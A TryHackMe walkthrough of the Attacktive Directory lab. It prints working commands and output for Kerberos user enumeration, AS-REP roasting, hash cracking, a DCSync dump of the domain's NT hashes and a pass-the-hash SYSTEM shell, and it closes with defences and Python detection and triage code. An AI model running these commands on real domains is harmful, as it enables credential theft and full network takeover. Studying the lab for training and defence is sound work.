Attacktive Directory – TryHackMe Walkthrough

Boris Tougma

Introduction: Unveiling the Attacktive Directory Lab

The Attacktive Directory room is a hands-on Active Directory exploitation lab that shows how two common weaknesses, an account with Kerberos pre-authentication disabled and a non-DC account holding directory replication rights, combine into a complete domain compromise. This write-up details the precise steps I followed, from initial reconnaissance to obtaining a SYSTEM shell on the domain controller.


Enumeration: Scanning the Network for Vulnerabilities

I began with a full TCP scan (all 65535 ports, with service and OS detection) using Nmap:

nmap -A -p- 10.10.142.138
Starting Nmap 7.80 ( https://nmap.org ) at 2025-04-29 09:33 BST
Nmap scan report for 10.10.142.138
Host is up (0.0063s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-29 08:33:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-04-29T08:36:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-04-28T07:58:20
|_Not valid after:  2025-10-28T07:58:20
|_ssl-date: 2025-04-29T08:36:35+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49832/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/29%Time=68108EF7%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 02:8F:FD:64:70:D9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/29%OT=53%CT=1%CU=44114%PV=Y%DS=1%DC=D%G=Y%M=028FFD%T
OS:M=68108F95%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=I%II=I
OS:%SS=S%TS=U)OPS(O1=M2301NW8NNS%O2=M2301NW8NNS%O3=M2301NW8%O4=M2301NW8NNS%
OS:O5=M2301NW8NNS%O6=M2301NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W
OS:6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=8
OS:0%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:8f:fd:64:70:d9 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-29T08:36:20
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   6.30 ms 10.10.142.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.23 seconds

The results revealed:

  • IIS 10.0 web server on 80/tcp (default page only)

  • Kerberos (88/tcp), LDAP (389/tcp) and Global Catalog LDAP (3268/tcp) with their TLS counterparts (636, 3269/tcp), SMB (445/tcp) and AD Web Services (9389/tcp): the host is a domain controller

  • RDP (3389/tcp) and WinRM (5985/tcp)

  • SMB signing enabled and required, so SMB relay is not an option here

  • Domain: spookysec.local, Hostname: ATTACKTIVEDIREC (AttacktiveDirectory.spookysec.local), Windows build 10.0.17763 (Server 2019)

With the web server offering nothing useful, I focused on SMB. Using enum4linux, I confirmed the domain SID, saw that null SMB sessions were allowed, and identified some standard accounts, but found no accessible shares.


Kerberos User Enumeration: Identifying High-Value Targets

Since SMB wasn’t giving me much, I turned to Kerberos user enumeration with kerbrute. It needs no credentials: for each candidate name it sends an AS-REQ without pre-authentication data, and the KDC answers KDC_ERR_PREAUTH_REQUIRED for an account that exists but KDC_ERR_C_PRINCIPAL_UNKNOWN for one that does not, so the error code alone confirms or denies the username:

💡
For this lab, we use custom username and password lists (userlist.txt and passwordlist.txt in the commands below).
./kerbrute_linux_amd64 userenum --dc 10.10.142.138 -d spookysec.local userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/29/25 - Ronnie Flathers @ropnop

2025/04/29 11:14:09 >  Using KDC(s):
2025/04/29 11:14:09 >      10.10.142.138:88

2025/04/29 11:14:09 >  [+] VALID USERNAME:     james@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     svc-admin@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     James@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     robin@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     darkstar@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     administrator@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     backup@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     paradox@spookysec.local
2025/04/29 11:14:10 >  [+] VALID USERNAME:     JAMES@spookysec.local
2025/04/29 11:14:10 >  [+] VALID USERNAME:     Robin@spookysec.local
2025/04/29 11:14:12 >  [+] VALID USERNAME:     Administrator@spookysec.local
2025/04/29 11:14:15 >  [+] VALID USERNAME:     Darkstar@spookysec.local
2025/04/29 11:14:15 >  [+] VALID USERNAME:     Paradox@spookysec.local
2025/04/29 11:14:18 >  [+] VALID USERNAME:     DARKSTAR@spookysec.local
2025/04/29 11:14:19 >  [+] VALID USERNAME:     ori@spookysec.local
2025/04/29 11:14:21 >  [+] VALID USERNAME:     ROBIN@spookysec.local
2025/04/29 11:14:25 >  Done! Tested 73317 usernames (16 valid) in 16.214 seconds

This identified several valid accounts. The 16 hits include case variants of the same names (james, James, JAMES) because the wordlist contains them; the KDC matches account names case-insensitively, so they collapse to eight accounts: james, svc-admin, robin, darkstar, administrator, backup, paradox and ori. Three stood out:

svc-admin@spookysec.local
backup@spookysec.local
administrator@spookysec.local

svc-admin and backup stood out as high-value targets: service and backup accounts are the ones most often left with weak passwords or excessive rights.


AS-REP Roasting: Exploiting Vulnerable Accounts

I checked for accounts with Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH) using Impacket’s GetNPUsers.py against the valid users found by kerbrute. For such an account the KDC hands out an AS-REP without any proof of the password, and part of that reply is encrypted with the user’s key, so it can be cracked offline:

GetNPUsers.py spookysec.local/ -usersfile valid_users.txt -no-pass -dc-ip 10.10.142.138
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:16457ba39787d68d1aa4cc734c7b48a0$ff55908cfaee397a6d64793a2d185356ecaab4379ab73e9649844d807c59adf23bb5e5946f6cb9cd410fdc370ec843c289e0d6362b89b166ce1c1294b66f54dd8c252db95e6fca0fa8cbc072ead48d424879830f0ce5d7c626ffa71ae67217c7cc799a2bd00c70c5e016dde6c996a1cc6e7db7f619690a19f0e1cfba4a9cbf712493e28f47c1dc86e3b005780393ec090079ce1423f021d0826db13f23f837da1a48d10f8c3d6dd07d5428cf27af3bba6da665fca1ab1104b771fd8255999fac779321aea40f6e5c4a8034f841f3a48d7a841c467a46363813c7b06db37fe851ca896d408d20c9ad7cd51769ad4fa2d1ee2c
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set

Only svc-admin was vulnerable. I saved the $krb5asrep$ line to hash.txt and cracked it with hashcat in mode 18200 (Kerberos 5 AS-REP, etype 23). The first command does the cracking; --show only prints results already stored in the potfile, so it comes second:

hashcat -m 18200 hash.txt passwordlist.txt
hashcat -m 18200 hash.txt passwordlist.txt --show

Credentials found:

svc-admin : management2005

SMB Access & Backup Credentials: Uncovering Hidden Secrets

Using these credentials, I accessed SMB shares:

smbclient -L //spookysec.local -I 10.10.142.138 -U svc-admin
Password for [WORKGROUP\svc-admin]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I found a backup share containing backup_credentials.txt.

smbclient //10.10.142.138/backup -U svc-admin
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

        8247551 blocks of size 4096. 4035435 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

The file holds one short Base64 string (the character set and the absence of any separator give it away), not a password hash:

cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding it (CyberChef or the base64 CLI tool both work) revealed a second credential:

backup@spookysec.local:backup2517860

DCSync & Hash Dumping: Extracting Domain Passwords

The backup account holds the directory replication rights (Replicating Directory Changes and Replicating Directory Changes All on the domain object) that make DCSync possible: with them, any principal can call the DRSUAPI replication interface and ask the DC for account secrets exactly as a peer domain controller would. secretsdump.py does just that, and -just-dc-ntlm limits the output to NT hashes:

secretsdump.py -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.142.138
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:b1511daf1f607e214432ec431f54345f:::
[*] Cleaning up...

From the output, I retrieved the Domain Administrator’s NT hash (the field before it, aad3b435b51404eeaad3b435b51404ee, is the empty LM hash, meaning no LM hashes are stored). Note also that a-spooks carries the same NT hash as Administrator, so that account shares the Domain Administrator’s password:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
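Before using any of these hashes it is worth running a quick triage over the dump, as an added example (my code, not the author’s): it parses secretsdump’s domain\user:rid:lmhash:nthash::: lines, groups accounts that share an NT hash (same hash, same password), and flags the empty-password hash, stored LM hashes, machine accounts and the built-in RIDs. SAMPLE_DUMP is a constructed subset of the output above.

```python
"""Added example, not code from the write-up: triage of a secretsdump
-just-dc-ntlm dump before any hash is used. Each line is
domain\\user:rid:lmhash:nthash::: ; equal NT hashes mean equal passwords, the
LM field is aad3b435b51404eeaad3b435b51404ee when no LM hash is stored, and
31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password.
SAMPLE_DUMP is a subset of the dump above, trailing status line included.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:b1511daf1f607e214432ec431f54345f:::
[*] Cleaning up...
"""


def parse_dump(text: str):
    """Return one dict per credential line; secretsdump status lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.endswith(":::"):
            continue
        name, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": name.split("\\")[-1], "rid": int(rid),
                        "lm": lm.lower(), "nt": nt.lower(), "machine": name.endswith("$")})
    return entries


def triage(entries):
    """Group by NT hash and pull out the findings worth acting on first."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "shared": {nt: users for nt, users in by_nt.items() if len(users) > 1},
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "machines": [e["user"] for e in entries if e["machine"]],
        "builtin_privileged": [e["user"] for e in entries if e["rid"] in (500, 502)],
    }


if __name__ == "__main__":
    for finding, value in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

On the page’s data this reports Administrator and a-spooks under one hash and skidy and breakerofthings under another, Guest with the empty password, no LM hashes, and the DC’s own machine account; the shared-hash finding is what turns “I have the Administrator hash” into “two accounts share that password”.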

Pass-the-Hash to Domain Admin: Achieving Full Domain Control

With the hash in hand, I used Pass-the-Hash. psexec.py authenticates over SMB with NTLM using the NT hash directly (the LM half before the colon is left empty), writes a service binary to the ADMIN$ share and starts it through the Service Control Manager, which is why the resulting shell runs as NT AUTHORITY\SYSTEM rather than as Administrator:

psexec.py spookysec.local/Administrator@10.10.142.138 -hashes :0e0363213e37b94221497260b0bcb4fc
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Requesting shares on 10.10.142.138.....
[*] Found writable share ADMIN$
[*] Uploading file BiNSwzVf.exe
[*] Opening SVCManager on 10.10.142.138.....
[*] Creating service VdCn on 10.10.142.138.....
[*] Starting service VdCn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users

c:\Users> dir
 Volume in drive C has no label.
 Volume Serial Number is EEA6-70E8

 Directory of c:\Users

09/17/2020  04:03 PM    <DIR>          .
09/17/2020  04:03 PM    <DIR>          ..
09/17/2020  04:04 PM    <DIR>          a-spooks
09/17/2020  04:02 PM    <DIR>          Administrator
04/04/2020  12:19 PM    <DIR>          backup
04/04/2020  01:07 PM    <DIR>          backup.THM-AD
04/04/2020  11:19 AM    <DIR>          Public
04/04/2020  12:18 PM    <DIR>          svc-admin
               0 File(s)              0 bytes
               8 Dir(s)  16,525,987,840 bytes free
c:\Users> type backup\Desktop\PrivEsc.txt
TryHackMe{********}

This gave me a SYSTEM shell on the domain controller, from which I retrieved the final flag.


Conclusion: Lessons Learned and Defensive Strategies

This attack chain moved from Kerberos user enumeration to AS-REP Roasting, credential harvesting from a file share, DCSync abuse, and finally Pass-the-Hash to full domain compromise.
The lab highlights how a single misconfigured account can escalate into total control of an Active Directory environment.

Defensive measures include:

  • Enforcing Kerberos pre-authentication: audit for accounts with the “Do not require Kerberos preauthentication” flag (UF_DONT_REQUIRE_PREAUTH) and remove it; where it has to stay, give the account a long random password and AES-only encryption types, so that any AS-REP still issued is not RC4-encrypted and is far slower to crack

  • Limiting DCSync rights: only domain controllers (and a very small, audited set of accounts) should hold Replicating Directory Changes and Replicating Directory Changes All on the domain object; a backup account never needs them

  • Keeping credentials out of file shares: the Base64 file on the backup share was the pivot from a low-value service account to a replication-capable one

  • Not reusing privileged passwords: the dump shows a-spooks with the same NT hash as Administrator

  • Monitoring unusual Kerberos and replication activity: bursts of 4768 events with failure code 0x6 from one source (user enumeration), successful 4768 events with pre-authentication type 0 and RC4 (0x17) ticket encryption (AS-REP roasting), and 4662 events carrying the DS-Replication-Get-Changes rights for anything that is not a domain controller (DCSync)
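As an added example for the monitoring point (my code, not the author’s), the following runs one check per stage of this chain over constructed Windows event records. The detections rest on documented behaviour: with Kerberos Authentication Service auditing on, every unknown name kerbrute probes produces a 4768 with failure code 0x6; an AS-REP roast shows as a successful 4768 with pre-authentication type 0 and ticket encryption 0x17 (RC4); DCSync shows as a 4662 whose Properties carry the DS-Replication-Get-Changes or Get-Changes-All GUIDs for a subject that is not a DC; and psexec.py installs a service with a random four-letter name running a random eight-letter .exe (VdCn and BiNSwzVf.exe in the shell output above). The attacker address, the enumeration threshold and the exact ImagePath form are assumptions.

```python
"""Added example, not from the write-up: detection logic for each stage of the
chain above, run over constructed Security/System-log events. Each event is a
dict carrying only the fields the checks need, named after the Windows ones
(4768: TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType;
4662: SubjectUserName, Properties; 7045: ServiceName, ImagePath). Facts relied
on: with Kerberos Authentication Service auditing on, every unknown name probed
by kerbrute yields a 4768 with Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN); an
AS-REP roast is a successful 4768 with PreAuthType 0 and RC4 (0x17) ticket
encryption; DCSync is a 4662 whose Properties contain the
DS-Replication-Get-Changes rights, for a subject that is not a DC; psexec.py's
service and binary names are random 4- and 8-letter strings (VdCn and
BiNSwzVf.exe above). Threshold, attacker address and ImagePath form are assumed.
"""
import re
from collections import defaultdict

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
DC_ACCOUNTS = {"ATTACKTIVEDIREC$"}   # computer accounts that legitimately replicate
ENUM_THRESHOLD = 20                   # distinct unknown principals from one source (assumed)
PSEXEC_SERVICE = re.compile(r"^[A-Za-z]{4}$")
PSEXEC_BINARY = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)
ATTACKER = "10.10.14.5"               # constructed attacker address

# Constructed events modelled on the chain in the write-up.
EVENTS = [
    {"EventID": 4768, "TargetUserName": f"guess{i}", "IpAddress": ATTACKER,
     "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "-"}
    for i in range(30)
] + [
    {"EventID": 4768, "TargetUserName": "svc-admin", "IpAddress": ATTACKER,
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "james", "IpAddress": "10.10.20.7",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},   # ordinary logon
    {"EventID": 4662, "SubjectUserName": "ATTACKTIVEDIREC$", "Properties": set(REPLICATION_GUIDS)},
    {"EventID": 4662, "SubjectUserName": "backup", "Properties": set(REPLICATION_GUIDS)},
    {"EventID": 4662, "SubjectUserName": "james",
     "Properties": {"11111111-2222-3333-4444-555555555555"}},   # constructed, not a replication right
    {"EventID": 7045, "ServiceName": "VdCn", "ImagePath": r"%SystemRoot%\BiNSwzVf.exe"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
]


def detect_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Sources that requested TGTs for many principals the KDC does not know."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}


def detect_asrep_roasting(events):
    """Successful TGT requests that skipped pre-auth and got an RC4-encrypted reply."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0"
            and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == "0x17"]


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """Replication rights exercised by a principal that is not a domain controller."""
    return [e["SubjectUserName"] for e in events
            if e["EventID"] == 4662 and e["Properties"] & REPLICATION_GUIDS
            and e["SubjectUserName"] not in dc_accounts]


def detect_psexec_service(events):
    """Service installs whose name and binary match impacket psexec's random naming."""
    return [e["ServiceName"] for e in events
            if e["EventID"] == 7045 and PSEXEC_SERVICE.match(e["ServiceName"])
            and PSEXEC_BINARY.match(e["ImagePath"])]


if __name__ == "__main__":
    print("user enumeration:", detect_user_enumeration(EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(EVENTS))
    print("DCSync:", detect_dcsync(EVENTS))
    print("psexec service:", detect_psexec_service(EVENTS))
```

The DCSync rule is the one to tune first: legitimate replication is logged with a DC computer account as the subject, so an allow-list of DC accounts is both necessary and sufficient, whereas the enumeration threshold depends on how noisy the environment’s mistyped logons are.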

Written by Boris Tougma

I'm a cybersecurity student who loves high-tech, but also music, cinema and Japanese culture.